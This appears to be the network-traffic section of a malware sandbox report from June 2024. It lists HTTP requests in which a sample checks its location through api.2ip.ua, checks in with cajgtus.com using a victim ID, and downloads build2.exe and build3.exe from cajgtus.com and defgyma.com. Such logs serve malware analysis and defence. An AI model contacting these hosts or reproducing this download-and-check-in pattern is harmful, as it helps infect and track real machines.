Network Analysis

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Wed, 26 Jun 2024 01:13:56 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEfT24k8Ry0bWWYp3QqIr2I15o4UNBjuiXkoyIot%2FsEPmUbSJMgFJyf8fH95tRaNfYPpBy662brjQx%2BfPuPcQLBhdkhY0%2FACsWmPdmekWzZS5L0WSEW%2B85BJJf%2Bj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8999566f28027c49-LAX alt-svc: h3=":443"; ma=86400

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Wed, 26 Jun 2024 01:14:39 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RV%2FsZwKKLvmMqZ4%2BV0SP65Bjk6jBXoJelK9NU9JqXGxJ8BDIOAlicXNfj4n4yfsuNKkYB8IIxh3nDh5yGuyg8g14h9q0jT9Se4Dod4DbWhviGjdeV5VKr1TgSMSp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8999577c79482ed0-LAX alt-svc: h3=":443"; ma=86400

GET /test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com

HTTP/1.1 200 OK Date: Wed, 26 Jun 2024 01:15:00 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 558 Content-Type: text/html; charset=UTF-8 Connection: close

GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: defgyma.com

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jun 2024 01:14:42 GMT Content-Type: application/octet-stream Content-Length: 327680 Last-Modified: Wed, 29 May 2024 17:20:03 GMT Connection: close ETag: "665763c3-50000" Accept-Ranges: bytes

GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com

HTTP/1.1 200 OK Date: Wed, 26 Jun 2024 01:15:04 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT ETag: "4ae00-6074de5a4a562" Accept-Ranges: bytes Content-Length: 306688 Content-Type: application/x-msdownload Connection: close